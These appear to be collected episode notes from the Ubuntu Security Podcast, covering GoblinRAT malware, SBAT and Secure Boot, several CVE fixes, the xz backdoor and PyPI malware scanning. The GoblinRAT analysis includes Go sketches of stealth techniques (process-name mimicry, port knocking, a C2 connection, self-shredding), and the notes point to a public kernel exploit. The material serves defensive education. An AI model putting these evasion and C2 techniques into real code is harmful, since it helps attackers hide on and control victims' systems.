A fortnightly podcast talking about the latest developments and updates from the Ubuntu Security team, including a summary of recent security vulnerabilities and fixes as well as a discussion on some of the goings on in the wider Ubuntu Security community.
This week we take a deep dive into the latest Linux malware, GoblinRAT, to look at how malware is evolving to stay stealthy and evade detection, and how malware authors are learning from modern software development along the way.
The Solar 4RAYS team (the Cyber Threat Research Center at Solar, a Russian cybersecurity firm) describes a new piece of Linux malware which they name GoblinRAT (RAT = Remote Access Trojan). They were contacted in 2023 by an IT company which provides services to (presumably) Russian government agencies, after it noticed system logs being deleted off one of their servers and a utility being downloaded to steal account passwords from a domain controller
Found this malware masquerading as a legitimate process; it takes quite careful steps to avoid detection - in fact most of the functionality within the malware is devoted to hiding its presence on the target system
Doesn't include automatic persistence but instead appears to be manually "installed" by the attackers with a unique name for each target, where it would be named after an existing legitimate process on the target system - similarly, even the names of its files and libraries were unique per-system to avoid detection. For example:
On one system it was named zabbix_agent and set up a new systemd service to launch itself at boot - which looks identical to the real Zabbix agent (except the real one is zabbix_agentd) - and then once running it edits its own command-line arguments after startup to insert the standard parameters expected by the real zabbix_agentd, so that in ps aux or similar output it appears basically identical to the real zabbix_agentd
On another it was named rhsmd to mimic the Red Hat subscription manager service, again using systemd as the launcher, whilst on others it ran as memcached using cron to launch it
On yet another, named chrony_debug to mimic the chronyd time synchronisation service, it would connect to a C2 machine named chronyd.tftpd.net - the attackers clearly went to a lot of work to hide this in plain sight
Automatically deletes itself off the system if it does not get pinged by the C2 operator after a certain period of time - and when it deletes itself it shreds itself to reduce the chance of being detected later via disk forensics etc
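As a rough illustration of that argv mimicry - a minimal Go sketch, with a hypothetical dropped-binary path and flags (GoblinRAT's own code is not public; it rewrites its own argv in place to the same effect, since ps and /proc/<pid>/cmdline simply report whatever argv a process carries):

// Start a binary under a fake argv so `ps aux` shows it as zabbix_agentd.
package main

import "os/exec"

func main() {
	cmd := exec.Command("/var/tmp/.agent") // hypothetical path of the dropped binary
	// argv[0] and the remaining arguments mimic the real daemon's usual command line
	cmd.Args = []string{"/usr/sbin/zabbix_agentd", "-c", "/etc/zabbix/zabbix_agentd.conf", "--foreground"}
	_ = cmd.Start()
}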
Has 2 versions - a "server" and "client" - the server uses port-knocking, watching incoming connection requests on a given network interface and then only actually allowing a connection if the expected sequence of port numbers was tried - this allows the controller of the malware to connect to it without the malware actively listening on a given port and hence reduces the chance it is detected accidentally (a rough sketch follows after the next bullet)
Client instead connects back to its specific C2 server
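A minimal sketch of the server-side port-knocking idea (illustrative only - the knock ports and control port here are invented, and GoblinRAT reportedly watches the interface passively, e.g. via a raw socket, rather than briefly binding each port as this simplified version does):

// Stay silent until a client hits a secret sequence of ports in order,
// then open the real control port for a single operator connection.
package main

import (
	"fmt"
	"net"
)

var knockSequence = []int{7000, 8000, 9000} // hypothetical secret sequence

func awaitKnocks() error {
	for _, port := range knockSequence {
		l, err := net.Listen("tcp", fmt.Sprintf(":%d", port))
		if err != nil {
			return err
		}
		conn, err := l.Accept() // wait for the next knock
		l.Close()               // stop listening immediately after
		if err != nil {
			return err
		}
		conn.Close()
	}
	return nil
}

func main() {
	if err := awaitKnocks(); err != nil {
		return
	}
	l, err := net.Listen("tcp", ":2222") // hypothetical control port
	if err != nil {
		return
	}
	defer l.Close()
	conn, _ := l.Accept()
	if conn != nil {
		conn.Close() // the operator session would be handled here
	}
}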
Logs collected by the 4RAYS team appear to show that the commands executed by the malware were quite manual looking - invoking bash and then later invoking commands like systemctl to stop and replace an existing service, with a time lag between commands in the order of seconds to minutes - so it would seem these were manually typed commands rather than automatically driven by scripts
Malware itself is implemented in Go and includes the ability to execute single commands as well as providing an interactive shell; also includes support for listing / copying / moving files including with compression; also works as a SOCKS5 proxy to allow it to proxy traffic to/from other hosts that may be behind more restrictive firewalls etc; and as detailed above the ability to mimic existing processes on the system to avoid detection
To try and frustrate reverse engineering, Gobfuscate was used to obfuscate the compiled code - an odd choice though, since this project was seemingly abandoned 3 years ago and nowadays garble seems to be the go-to tool for this (no pun intended) - but perhaps this is evidence of the age of the campaign, since these samples all date back to 2020 when this project was more active…
Encrypts its configuration using AES-GCM and the config contains details like the shell to invoke, kill-switch delay and secret value to use to disable it, alternate process name to use plus the TLS certificate and keys to use when communicating with the C2 server
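A sketch of AES-GCM config decryption using Go's standard library (the key handling and the nonce-prepended blob layout are assumptions for illustration, not details from the report):

package main

import (
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

func decryptConfig(key, blob []byte) ([]byte, error) {
	block, err := aes.NewCipher(key) // key must be 16/24/32 bytes
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize() {
		return nil, fmt.Errorf("config blob too short")
	}
	// assume the nonce is prepended to the ciphertext
	nonce, ciphertext := blob[:gcm.NonceSize()], blob[gcm.NonceSize():]
	return gcm.Open(nil, nonce, ciphertext, nil)
}

func main() {
	key := make([]byte, 32) // placeholder key; the real one lives in the binary
	if _, err := decryptConfig(key, nil); err != nil {
		fmt.Println(err)
	}
}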
Then uses the yamux Go connection-multiplexing library to multiplex the single TLS connection to/from the C2 server - a sketch follows below
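A sketch of that multiplexing with the hashicorp/yamux library named in the write-up (the address and TLS config here are placeholders):

package main

import (
	"crypto/tls"

	"github.com/hashicorp/yamux"
)

func connectC2(addr string, conf *tls.Config) error {
	conn, err := tls.Dial("tcp", addr, conf)
	if err != nil {
		return err
	}
	session, err := yamux.Client(conn, nil) // client side of the mux
	if err != nil {
		return err
	}
	// each logical channel (shell, file transfer, SOCKS5 ...) becomes a
	// separate stream over the single TLS connection
	stream, err := session.Open()
	if err != nil {
		return err
	}
	defer stream.Close()
	_, err = stream.Write([]byte("hello"))
	return err
}

func main() {
	// placeholder address and an insecure config purely for illustration
	_ = connectC2("203.0.113.10:443", &tls.Config{InsecureSkipVerify: true})
}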
Can then be instructed to perform the various actions like running commands / launching a shell / list files in a directory / reading files etc as discussed before
Other interesting part is the kill switch / self-destruct functionality - if kill switch delay is specified in the encrypted configuration malware will automatically delete itself by invoking dd to overwrite itself with input from /dev/urandom 8 times; once more with 0 bytes and finally then removing the file from disk
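A sketch of that self-destruct sequence, shelling out to dd as the report describes (the 4 KiB block size and the use of os.Executable() are assumptions):

// Overwrite our own binary 8 times with random data, once with zeros,
// then unlink it - mirroring the behaviour described in the report.
package main

import (
	"fmt"
	"os"
	"os/exec"
)

func selfDestruct() error {
	self, err := os.Executable()
	if err != nil {
		return err
	}
	st, err := os.Stat(self)
	if err != nil {
		return err
	}
	blocks := st.Size()/4096 + 1 // enough 4 KiB blocks to cover the file
	sources := []string{"/dev/urandom", "/dev/urandom", "/dev/urandom",
		"/dev/urandom", "/dev/urandom", "/dev/urandom",
		"/dev/urandom", "/dev/urandom", "/dev/zero"}
	for _, src := range sources {
		err := exec.Command("dd", "if="+src, "of="+self,
			"bs=4096", fmt.Sprintf("count=%d", blocks), "conv=notrunc").Run()
		if err != nil {
			return err
		}
	}
	return os.Remove(self)
}

func main() { _ = selfDestruct() }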
Overall 4 organisations were found to have been hacked with this and in each it was running with full admin rights - with some running for over 3 years - and various binaries show compilation dates and golang toolchain versions indicating this was developed since at least 2020
But unlike other malware that we have covered, it does not appear to be a more widespread campaign since “other information security companies with global sensor networks” couldn’t find any similar samples in their own collections
No clear evidence of origin - Solar 4RAYS asking for other cybersecurity companies to help contribute to their evidence to identify the attackers
Interesting to see that the evolution of malware mirrors that of normal software development - no longer using C/C++ etc but more modern languages like Go, which provide exactly the sorts of functionality you want in your malware - systems-level programming with built-in concurrency and memory safety - plus Go binaries are statically linked, so there is no need to worry about dependencies on the target system
For the third and final part in our series for Cybersecurity Awareness Month, Alex is again joined by Luci as well as Diogo Sousa to discuss future trends in cybersecurity and the likely threats of the future.
In the second part of our series for Cybersecurity Awareness Month, Luci is back with Alex, along with Eduardo Barretto to discuss our top cybersecurity best practices.
For the first in a 3-part series for Cybersecurity Awareness month, Luci Stanescu joins Alex to discuss the recent CUPS vulnerabilities as well as the evolution of cybersecurity since the origin of the internet.
John and Maxime have been talking about Ubuntu's AppArmor user namespace restrictions at the Linux Security Summit in Europe this past week, plus we cover some more details from the official announcement of permission prompting in Ubuntu 24.10, a new release of Intel TDX for Ubuntu 24.04 LTS and more.
613 unique CVEs addressed in the past fortnight
The long awaited preview of snapd-based AppArmor file prompting is finally seeing the light of day, plus we cover the recent 24.04.1 LTS release and the podcast officially moves to a fortnightly cycle.
45 unique CVEs addressed
Accesses via the home interface in snapd get tagged with a prompt attribute - any access which would normally be allowed is instead delegated to a trusted helper application which displays a dialog to the user asking them to explicitly allow such access
Comparable to the kernel's seccomp_unotify interface - which allows delegating seccomp decisions to userspace in a very similar manner and has existed since the 5.5 kernel released in January 2020
Shipped via the desktop-security-center snap as well as the prompting-client snap
A recent Microsoft Windows update breaks Linux dual-boot - or does it? This week we look into reports of the recent Windows patch-Tuesday update breaking dual-boot, including a deep-dive into the technical details of Secure Boot, SBAT, grub, shim and more, plus we look at a vulnerability in GNOME Shell and the handling of captive portals as well.
135 unique CVEs addressed
The update's SBAT policy revokes grub,1 and grub,2 - ie it sets the minimum generation number for grub to 3
The current revocations can be listed with mokutil --list-sbat-revocations or read directly via cat /sys/firmware/efi/efivars/SbatLevelRT-605dab50-e046-4300-abb6-3dd810dd8b23
mokutil --list-sbat-revocations
sbat,1,2023012900
shim,2
grub,3
grub.debian,4
To inspect the SBAT section of the installed grub binary:
objdump -j .sbat -s /boot/efi/EFI/ubuntu/grubx64.efi | xxd -r
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
grub,4,Free Software Foundation,grub,2.12,https://www.gnu.org/software/grub/
grub.ubuntu,2,Ubuntu,grub2,2.12-5ubuntu4,https://www.ubuntu.com/
grub.peimage,2,Canonical,grub2,2.12-5ubuntu4,https://salsa.debian.org/grub-team/grub/-/blob/master/debian/patches/secure-boot/efi-use-peimage-shim.patch
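# The script below compares the .sbat sections of the signed grub binaries across Ubuntu releases: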
rm -rf grub2-signed
mkdir grub2-signed
pushd grub2-signed >/dev/null || exit
for rel in focal jammy noble; do
mkdir $rel
pushd $rel >/dev/null || exit
pull-lp-debs grub2-signed $rel-security 1>/dev/null 2>/dev/null || pull-lp-debs grub2-signed $rel-release 1>/dev/null 2>/dev/null
dpkg-deb -x grub-efi-amd64-signed*.deb grub2-signed
echo $rel
echo -----
find . -name grubx64.efi.signed -exec objdump -j .sbat -s {} \; | tail -n +5 | xxd -r
popd >/dev/null || exit
done
popd >/dev/null
focal
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
grub,4,Free Software Foundation,grub,2.06,https://www.gnu.org/software/grub/
grub.ubuntu,1,Ubuntu,grub2,2.06-2ubuntu14.4,https://www.ubuntu.com/
jammy
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
grub,4,Free Software Foundation,grub,2.06,https://www.gnu.org/software/grub/
grub.ubuntu,1,Ubuntu,grub2,2.06-2ubuntu14.4,https://www.ubuntu.com/
noble
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
grub,4,Free Software Foundation,grub,2.12,https://www.gnu.org/software/grub/
grub.ubuntu,2,Ubuntu,grub2,2.12-1ubuntu7,https://www.ubuntu.com/
grub.peimage,2,Canonical,grub2,2.12-1ubuntu7,https://salsa.debian.org/grub-team/grub/-/blob/master/debian/patches/secure-boot/efi-use-peimage-shim.patch
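# The script below does the same comparison for the signed shim binaries: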
rm -rf shim-signed
mkdir shim-signed
pushd shim-signed >/dev/null || exit
for rel in focal jammy noble; do
mkdir $rel
pushd $rel >/dev/null || exit
pull-lp-debs shim-signed $rel-security 1>/dev/null 2>/dev/null || pull-lp-debs shim-signed $rel-release 1>/dev/null 2>/dev/null
dpkg-deb -x shim-signed*.deb shim-signed
echo $rel
echo -----
find . -name shimx64.efi.signed.latest -exec objdump -j .sbat -s {} \; | tail -n +5 | xxd -r
popd >/dev/null || exit
done
popd >/dev/null
focal
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
shim,3,UEFI shim,shim,1,https://github.com/rhboot/shim
shim.ubuntu,1,Ubuntu,shim,15.7-0ubuntu1,https://www.ubuntu.com/
jammy
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
shim,3,UEFI shim,shim,1,https://github.com/rhboot/shim
shim.ubuntu,1,Ubuntu,shim,15.7-0ubuntu1,https://www.ubuntu.com/
noble
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
shim,4,UEFI shim,shim,1,https://github.com/rhboot/shim
shim.ubuntu,1,Ubuntu,shim,15.8-0ubuntu1,https://www.ubuntu.com/
only noble has a new-enough shim in the security/release pocket - both focal and jammy have the older one - but the new 4th generation shim is currently undergoing testing in the -proposed pocket and will be released next week
until then, if affected, you need to disable Secure Boot in the BIOS and then can either wait until the new shim is released OR just reboot twice in this mode and shim will automatically reset the SBAT policy to the previous version, allowing the older shim to still be used
then can re-enable Secure Boot in BIOS
Once new shim is released it will reinstall the new SBAT policy to revoke its older version
One other thing, this also means the old ISOs won’t boot either
This week we take a behind-the-scenes deep dive into how the team handled a recent report from Snyk's Security Lab of a local privilege escalation vulnerability in wpa_supplicant, plus we cover security updates in Prometheus Alertmanager, OpenSSL, Exim, snapd, Gross, curl and more.
185 unique CVEs addressed
Use-after-free in the SSL_free_buffers API - requires an application to directly call this function - across the entire Ubuntu package ecosystem there doesn't appear to be any package that does this, so highly unlikely to be an issue in practice
SSL_select_next_proto - if called with an empty buffer list would read other private memory - ie an OOB read - and potentially then either crash or return private data
Applications using the SSL_OP_NO_TICKET option would possibly get into a state where the session cache would not be flushed and so would grow unbounded - a memory-based DoS
A file would get written out under /usr/share/applications which is world-readable - so if the symlink pointed to /etc/shadow then you would get a copy of this written out as world-readable - so an unprivileged user on the system could then possibly escalate their privileges
Buffer overflow via strncat() during logging
wpa_supplicant (16:10)
Snyk's report: a local unprivileged attacker can trick wpa_supplicant into loading an attacker-controlled shared object into memory - and wpa_supplicant runs as root
Ubuntu and Debian configure wpa_supplicant to allow various methods to be called by users in the netdev group via its DBus interface - including CreateInterface with a ConfigFile argument which specifies the path to a configuration file using the format of wpa_supplicant.conf - such a config can set opensc_engine_path or similarly the PKCS11 engine and module paths, which get loaded as shared objects
We checked how other distros configure the wpa_supplicant DBus interface - none appear to make use of the netdev group
The fix is for wpa_supplicant to check that the specified module is owned by root - this should then stop an unprivileged user from creating their own module and specifying it, as it wouldn't be owned by root
This can be sidestepped via a FUSE filesystem though: each process has a root link inside the proc filesystem - which points to the actual root directory of that process - and since the FUSE fs lies about the UID, the module looks root-owned
Part of the check relies on how realpath works (which should block the ability to read it via the proc symlink)
A stricter approach is to only allow modules under /usr/lib - since anything installed from the archive would live here - in this case we simply call realpath() directly on the provided path name and if it doesn't start with /usr/lib then deny loading of the module
A module in /opt would now fail, BUT if you can write to /opt then you can write to somewhere in /usr/lib - so that is easy to fix as well
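A rough Go rendering of that path check (the actual fix is C code inside wpa_supplicant; this sketch just illustrates the realpath()-then-prefix logic):

package main

import (
	"path/filepath"
	"strings"
)

func moduleAllowed(path string) bool {
	abs, err := filepath.Abs(path)
	if err != nil {
		return false
	}
	real, err := filepath.EvalSymlinks(abs) // like realpath(3)
	if err != nil {
		return false
	}
	// deny anything that does not resolve to a file under /usr/lib
	return strings.HasPrefix(real, "/usr/lib/")
}

func main() {
	println(moduleAllowed("/usr/lib/x86_64-linux-gnu/libc.so.6"))
}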
This week we take a look at the recent CrowdStrike outage and what we can learn from it compared to the testing and release process for security updates in Ubuntu, plus we cover details of vulnerabilities in poppler, phpCAS, EDK II, Python, OpenJDK and one package with over 300 CVE fixes in a single update.
462 unique CVEs addressed
This week we deep-dive into one of the best vulnerabilities we've seen in a long time: regreSSHion - an unauthenticated, remote, root code-execution vulnerability in OpenSSH. Plus we cover updates for Plasma Workspace, Ruby, Netplan, FontForge, OpenVPN and a whole lot more.
39 unique CVEs addressed
A user@host:port combination could be mishandled - so it would possibly then use a different hostname than the one the user expected
Using ungetbyte()/ungetc() to push back characters on an IO stream would possibly read beyond the end of the buffer - an OOB read
Filenames get passed to the system() system call - which spawns a shell - so if a filename contained any shell metacharacters, could then just easily get arbitrary code execution
regreSSHion: the SIGALRM handler calls syslog(), which is one of those async-signal-unsafe functions - syslog() will potentially call malloc()/free(), which is not async-safe
If the process is in the middle of malloc()/free() when the SIGALRM signal is delivered (since malloc()/free() calls the brk(2) system call under the hood, a pending SIGALRM may be delivered on return from brk()), the signal handler may then call malloc() at the same time - corrupting the global state of the heap etc
The mitigation avoids calling syslog() during the SIGALRM signal handler, and syslog() gets called early on in the use of OpenSSH so that when it later gets called in the SIGALRM signal handler it doesn't do the same memory allocation and hence can't be used to corrupt memory and get code execution
A look into CISA's Known Exploited Vulnerability Catalogue is on our minds this week, plus we look at vulnerability updates for gdb, Ansible, CUPS, libheif, Roundcube, the Linux kernel and more.
175 unique CVEs addressed
Failure to appropriately sanitise the tower_callback parameter (nowadays called aap_callback - Ansible Automation Platform)
Variables tagged unsafe - in that they may come from an external, untrusted source - won't get evaluated/expanded when used, to avoid possible info leaks etc - various issues where Ansible would fail to respect this and essentially forget they were tagged as unsafe, and end up exposing secrets as a result
If a printer PPD specifies FoomaticRIPCommandLine then it can run arbitrary commands as root
Linux kernel fixes covering AF_PACKET, tty, ptrace, futex and others
This week we bring you a special edition of the podcast, featuring an interview between Ijlal Loutfi and Karen Horovitz who deep-dive into Confidential Computing. Ranging from a high-level discussion of the need for and the features provided by confidential computing, through to the specifics of how this is implemented in Ubuntu and a look at similar future security technologies that are on the horizon.
As the podcast winds down for a break over the next month, this week we talk about RSA timing side-channel attacks and the recently announced DNSBomb vulnerability as we cover security updates in VLC, OpenSSL, Netatalk, WebKitGTK, amavisd-new, Unbound, Intel Microcode and more.
152 unique CVEs addressed
The team is back from Madrid and this week we bring you some of our plans for the upcoming Ubuntu 24.10 release, plus we talk about Google’s kernelCTF project and Mozilla’s PDF.js sandbox when covering security updates for the Linux kernel, Firefox, Spreadsheet::ParseExcel, idna and more.
121 unique CVEs addressed
Exploits using io_uring or nftables were out of scope, since they were disabled in their target kernel configuration due to the high number of historical vulns in both subsystems
Spreadsheet::ParseExcel called eval() on untrusted user input - high profile, disclosed by Mandiant, since it affected Barracuda email gateway devices and was publicly reported as being exploited against these by a Chinese APT group
Ubuntu 24.04 LTS is finally released and we cover all the new security features it brings, plus we look at security vulnerabilities in, and updates for, FreeRDP, Zabbix, CryptoJS, cpio, less, JSON5 and a heap more.
61 unique CVEs addressed
cpio: can be mitigated via the --no-absolute-filenames CLI argument
less: handling of the LESSOPEN environment variable failed to properly quote newlines embedded in a filename - could then allow for arbitrary code execution if less is run on some untrusted file - LESSOPEN is automatically set in Debian/Ubuntu via lesspipe, which allows running less on say a gz-compressed log file or even on a tar.gz tarball to list the files etc
Cookie name prefixes (__Host- and __Secure-) have specific meanings and in general should not be allowed to be specified by the network but only by the browser itself - so this can be used to bypass the usual restrictions (apparently this issue was reported upstream by the original reporter of the 2022 vuln but it got ignored by upstream till now…)
PHP's password_verify() function would sometimes return true for wrong passwords - ie if the actual password started with a NUL byte and the specified password was the empty string, it would verify as true (unlikely to be an issue in practice)
The PHP_CLI_SERVER_WORKERS env var value - integer overflow -> wraparound -> allocate a small amount of memory for a large number of values -> buffer overflow (low priority since would need to be able to set this env var first)
JSON5: parsing a __proto__ key would allow the ability to set arbitrary keys etc within the returned object -> RCE
Kernel type | 22.04 | 20.04 | 18.04 |
---|---|---|---|
aws | 103.3 | 103.3 | — |
aws-5.15 | — | 103.3 | — |
aws-5.4 | — | — | 103.3 |
aws-6.5 | 103.1 | — | — |
azure | 103.3 | 103.3 | — |
azure-5.4 | — | — | 103.3 |
azure-6.5 | 103.1 | — | — |
gcp | 103.3 | 103.3 | — |
gcp-5.15 | — | 103.3 | — |
gcp-5.4 | — | — | 103.3 |
gcp-6.5 | 103.1 | — | — |
generic-5.15 | — | 103.3 | — |
generic-5.4 | — | 103.3 | 103.3 |
gke | 103.3 | 103.3 | — |
hwe-6.5 | 103.1 | — | — |
ibm | 103.3 | — | — |
ibm-5.15 | — | 103.3 | — |
linux | 103.3 | — | — |
lowlatency-5.15 | — | 103.3 | — |
lowlatency-5.4 | — | 103.3 | 103.3 |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
John and Georgia are at the Linux Security Summit presenting on some long awaited developments in AppArmor and we give you all the details in a sneak peek preview as well as some of the other talks to look out for, plus we cover security updates for NSS, Squid, Apache, libvirt and more and we put out a call for testing of a pending AppArmor security fix too.
86 unique CVEs addressed
A signed value passed to g_new0() from glib, which expects an unsigned value -> tries to allocate an extremely large amount of memory -> crash
Talks covered pledge() and unveil() from OpenBSD - including specifying the process to kill along with the associated signal to deliver
This week we cover the recent reports of a new local privilege escalation exploit against the Linux kernel, follow-up on the xz-utils backdoor from last week and it’s the beta release of Ubuntu 24.04 LTS - plus we talk security vulnerabilities in the X Server, Django, util-linux and more.
76 unique CVEs addressed
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | 102.1 | 102.1 | 102.1 | 102.1 | — |
aws-5.15 | — | 102.1 | — | — | — |
aws-5.4 | — | — | 102.1 | — | — |
aws-6.5 | 102.1 | — | — | — | — |
aws-hwe | — | — | — | 102.1 | — |
azure | 102.1 | 102.1 | — | 102.1 | — |
azure-4.15 | — | — | 102.1 | — | — |
azure-5.4 | — | — | 102.1 | — | — |
azure-6.5 | 102.1 | — | — | — | — |
gcp | 102.1 | 102.1 | — | 102.1 | — |
gcp-4.15 | — | — | 102.1 | — | — |
gcp-5.15 | — | 102.1 | — | — | — |
gcp-5.4 | — | — | 102.1 | — | — |
gcp-6.5 | 102.1 | — | — | — | — |
generic-4.15 | — | — | 102.1 | 102.1 | — |
generic-4.4 | — | — | — | 102.1 | 102.1 |
generic-5.15 | — | 102.1 | — | — | — |
generic-5.4 | — | 102.1 | 102.1 | — | — |
gke | 102.1 | 102.1 | — | — | — |
gke-5.15 | — | 102.1 | — | — | — |
gkeop | — | 102.1 | — | — | — |
hwe-6.5 | 102.1 | — | — | — | — |
ibm | 102.1 | 102.1 | — | — | — |
ibm-5.15 | — | 102.1 | — | — | — |
linux | 102.1 | — | — | — | — |
lowlatency | 102.1 | — | — | — | — |
lowlatency-4.15 | — | — | 102.1 | 102.1 | — |
lowlatency-4.4 | — | — | — | 102.1 | 102.1 |
lowlatency-5.15 | — | 102.1 | — | — | — |
lowlatency-5.4 | — | 102.1 | 102.1 | — | — |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
Firefox uses unprivileged user namespaces for its sandbox (which would otherwise require CAP_SYS_ADMIN) - but when this is denied, Firefox correctly detects it and falls back to the correct behaviour
The exploit targets the n_gsm driver in the 6.4 and 6.5 kernels
Two copies of the exploit were published - one by jmpeax (Jammes), who wanted to purchase the exploit - and they are essentially identical:
diff -w <(curl https://raw.githubusercontent.com/jmpe4x/GSM_Linux_Kernel_LPE_Nday_Exploit/main/main.c) <(curl https://raw.githubusercontent.com/YuriiCrimson/ExploitGSM/main/ExploitGSM_6_5/main.c)
Both abuse n_gsm
/sys/kernel/notes leaks the symbol of the xen_startup function and allows KASLR to be broken
The executable payloads were embedded as binary blobs in the test files. This was a blatant violation of the Debian Free Software Guidelines.
On machines that see lots of bots poking at the SSH port, the backdoor noticeably increased CPU load, resulting in degraded user experience and thus overwhelmingly negative user feedback.
The maintainer who added the backdoor has disappeared.
Backdoors are bad for security.
It’s been an absolutely manic week in the Linux security community as the news and reaction to the recent announcement of a backdoor in the xz-utils project was announced late last week, so we dive deep into this issue and discuss how it impacts Ubuntu and give some insights for what this means for the open source and Linux communities in the future.
20 unique CVEs addressed
(you couldn't simply run strings on it and get any real sensible output)
This week we bring you a sneak peek of how Ubuntu 23.10 fared at Pwn2Own Vancouver 2024, plus news of malicious themes in the KDE Store and we cover security updates for the Linux kernel, X.Org X Server, TeX Live, Expat, Bash and more.
61 unique CVEs addressed
We cover recent Linux malware from the Magnet Goblin threat actor, plus the news of Ubuntu 23.10 as a target in Pwn2Own Vancouver 2024 and we detail vulnerabilities in Puma, AccountsService, Open vSwitch, OVN, and more.
102 unique CVEs addressed
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | 101.1 | 101.1 | 101.1 | 101.1 | — |
aws-5.15 | — | 101.1 | — | — | — |
aws-5.4 | — | — | 101.1 | — | — |
aws-6.5 | 101.1 | — | — | — | — |
aws-hwe | — | — | — | 101.1 | — |
azure | 101.1 | 101.1 | — | 101.1 | — |
azure-4.15 | — | — | 101.1 | — | — |
azure-5.4 | — | — | 101.1 | — | — |
azure-6.5 | 101.1 | — | — | — | — |
gcp | 101.1 | 101.1 | — | 101.1 | — |
gcp-4.15 | — | — | 101.1 | — | — |
gcp-5.15 | — | 101.1 | — | — | — |
gcp-5.4 | — | — | 101.1 | — | — |
gcp-6.5 | 101.1 | — | — | — | — |
generic-4.15 | — | — | 101.1 | 101.1 | — |
generic-4.4 | — | — | — | 101.1 | 101.1 |
generic-5.15 | — | 101.2 | — | — | — |
generic-5.4 | — | 101.1 | 101.1 | — | — |
gke | 101.1 | — | — | — | — |
gke-5.15 | — | 101.1 | — | — | — |
gkeop | — | 101.1 | — | — | — |
hwe-6.5 | 101.1 | — | — | — | — |
ibm | 101.1 | 101.1 | — | — | — |
ibm-5.15 | — | 101.1 | — | — | — |
linux | 101.2 | — | — | — | — |
lowlatency-4.15 | — | — | 101.1 | 101.1 | — |
lowlatency-4.4 | — | — | — | 101.1 | 101.1 |
lowlatency-5.15 | — | 101.2 | — | — | — |
lowlatency-5.4 | — | 101.1 | 101.1 | — | — |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
Previously the new password was exposed via /proc/<pid>/cmdline - very low risk since the process only exists for a very small time AND the password is encrypted already - instead it now invokes chpasswd and supplies the new encrypted password over standard input - you would then need to be able to ptrace it to see it, which with YAMA ptrace_scope enabled in Ubuntu means you need to be root (or a parent process of accountsservice, which is started by dbus for the current user) - so an attacker would have to be able to cause the existing accountsservice to stop and then start their own to see the new encrypted password
Talks to a /dashboard/ endpoint - likely to try and hide its network traffic in plain sight (rather than the raw TCP sockets with custom encrypted protocol employed by NerbianRAT)
Andrei is back to discuss recent academic research into malware within the Python/PyPI ecosystem and whether it is possible to effectively combat it with open source tooling, plus we cover security updates for Unbound, libuv, node.js, the Linux kernel, libgit2 and more.
56 unique CVEs addressed
A hostname gets copied into a buffer before being passed to getaddrinfo() - but it would then fail to NUL-terminate the string - as such, getaddrinfo() would read past the end of the buffer and the address that got resolved may not be the intended one - so then a remote attacker who could influence this could end up causing the application to contact a different address than expected and so perhaps access internal services etc
Input like <<<<<<.... would cause exponential performance degradation
Use of send() rather than public_send() allowed access to private methods to directly execute system calls
libgit2: issues including in git_index_add
When parsing /etc/resolv.conf, /etc/hosts, /etc/nsswitch.conf or anything specified via the HOSTALIASES environment variable - if a line has an embedded NUL as its first character, it would then attempt to read memory prior to the start of the buffer and hence an OOB read -> crash
Hey, Alex!
We will continue our journey today beyond the scope of the previous episodes. We’ve delved into the realms of network security, federated infrastructures, and vulnerability detection and assessment.
Last year, the Ubuntu Security Team participated in the Linux Security Summit in Bilbao. At that time, I managed to have a discussion with Zach, who hosted a presentation at the Supply Chain Security Con entitled “Will Large-Scale Automated Scanning Stop Malware on OSS Repositories?”. I later discovered that his talk was backed by a paper that he and his colleagues from Chainguard had published.
With this in mind, today we will be examining “Bad Snakes: Understanding and Improving Python Package Index Malware Scanning”, which was published last year in ACM’s International Conference on Software Engineering.
The aim of the paper is to highlight the current state of the Python and PyPi ecosystems from a malware detection standpoint, identify the requirements for a mature malware scanner that can be integrated into PyPi, and ascertain whether the existing open-source tools meet these objectives.
With this in mind, let’s start by understanding the context.
Applications can be distributed through repositories. This means that the applications are packaged into a generic format and published in either managed or unmanaged repositories. Users can then install the application by querying the repositories, downloading the application in a format that they can unpack through a client, and subsequently run on their hosts.
There are numerous repositories out there. Some target specific operating systems, as is the case with Debian repositories, the Snap Store, Google Play, or the Microsoft Store. Others are designed to store packages for a specific programming language, such as PyPi, npm, and RubyGems. Firefox Add-ons and the Chrome extension store target a specific platform, namely the browser.
Another relevant characteristic when discussing repositories is the level of curation. The Ubuntu Archive is considered a curated repository of software packages because there are several trustworthy contributors able to publish software within the repository. Conversely, npm is unmanaged because any member of the open-source community can publish anything in it.
We will discuss the Python Package Index extensively, which is the de facto unmanaged repository for the Python programming language. As of the 7th of March 2024, there were 5.4 million releases for 520 thousand projects and nearly 800 thousand users. It is governed by a non-profit organisation and run by volunteers worldwide.
Software repositories foster the dependencies of software on other pieces of software, controlled by different parties. As seen in campaigns such as the SolarWinds SUNBURST attack, this can go awry. Attackers can gain control over software in a company’s supply chain, gain initial access to their infrastructure, and exploit this advantage.
Multiple attack vectors are possible. Accounts can be hijacked. Attackers may publish packages with similar names (in a tactic known as typosquatting). They can also leverage shrink-wrapped clones, which are duplicates of existing packages, where malicious code is injected after gaining users’ trust. While covering all attack vectors is beyond the scope of this podcast episode, you can find a comprehensive taxonomy in a paper called “Taxonomy of Attacks on Open-Source Software Supply Chains”, which lists over 100 unique attack vectors.
From 2017 to 2022, the number of unique projects removed from PyPi increased rapidly: 38 in the first year, followed by 130, 60, 500, 27 thousand, and finally 12 thousand in the last year. Despite the fact that most of these were reported as malware, it's worth noting that the impact of some of them is limited due to the lack of organic usage.
